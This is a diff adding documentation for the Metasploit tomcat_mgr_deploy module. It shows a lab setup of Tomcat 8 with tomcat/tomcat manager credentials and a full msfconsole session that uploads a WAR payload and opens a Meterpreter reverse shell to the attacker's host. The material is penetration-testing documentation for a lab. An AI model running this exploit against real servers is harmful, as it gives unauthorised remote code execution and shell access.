documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md

```diff
@@ -0,0 +1,443 @@
+
+### Tomcat8 (8.0.32) - Ubuntu server 16.04 64bit
+Of note, as of 7, the permission role 'manager' has been divided into several sub-roles.  Each sub role the user has will change which `path` variable for exploitation.
+
+#### Setup
+
+1. `apt-get install tomcat8 tomcat8-admin`
+
+#### text/script Interface Exploitation
+
+1. Edit `/etc/tomcat8/tomcat-users.xml` to add:
+
+  ```
+  <role rolename="manager-script"/>
+  <user username="tomcat" password="tomcat" roles="manager-script"/>
+  ```
+
+2. Restart tomcat: `sudo service tomcat8 restart`
+  1. To verify the permissions are all set correctly, browse to `http://192.168.2.118:8087/manager/text/deploy`, and you should see `FAIL - Invalid parameters supplied for command [/deploy]
+` as opposed to `403 Access Denied`
+
+3. Exploit:
+
+    ```
+    msf > use exploit/multi/http/tomcat_mgr_deploy 
+    msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
+    rhost => 192.168.2.118
+    msf exploit(tomcat_mgr_deploy) > set rport 8088
+    rport => 8088
+    msf exploit(tomcat_mgr_deploy) > set target 3
+    target => 3
+    msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
+    payload => linux/x86/mettle/reverse_tcp
+    msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
+    lhost => 192.168.2.117
+    msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
+    HttpUsername => tomcat
+    msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
+    HttpPassword => tomcat
+    msf exploit(tomcat_mgr_deploy) > set verbose true
+    verbose => true
+    msf exploit(tomcat_mgr_deploy) > set path /manager/text
+    path => /manager/text
+    msf exploit(tomcat_mgr_deploy) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.117:4444 
+    [*] Using manually select target "Linux x86"
+    [*] Uploading 1560 bytes as 9s0fTUyPa2HJCDnod2wEQJ.war ...
+    [!] No active DB -- Credential data will not be saved!
+    [*] Executing /9s0fTUyPa2HJCDnod2wEQJ/ndAfDrUY.jsp...
+    [*] Undeploying 9s0fTUyPa2HJCDnod2wEQJ ...
+    [*] Transmitting intermediate stager...(106 bytes)
+    [*] Sending stage (335800 bytes) to 192.168.2.118
+    [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:33802) at 2017-01-14 11:06:13 -0500
+    
+    meterpreter > sysinfo
+    Computer     : 192.168.2.118
+    OS           : Ubuntu 16.04 (Linux 4.4.0-59-generic)
+    Architecture : x64
+    Meterpreter  : x86/linux
+    ```
+
+#### gui Interface
+The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`.  However, my attempts were unsuccessful, also wasn't able to figure out where the `check` command's `serverinfo` URL was located.  [Manual exploitation is possible](#manual-exploitation)
+
+# Manual Exploitation
```

Comment:
This entire section is actually from `tomcat_mgr_upload` which i'll be working on next.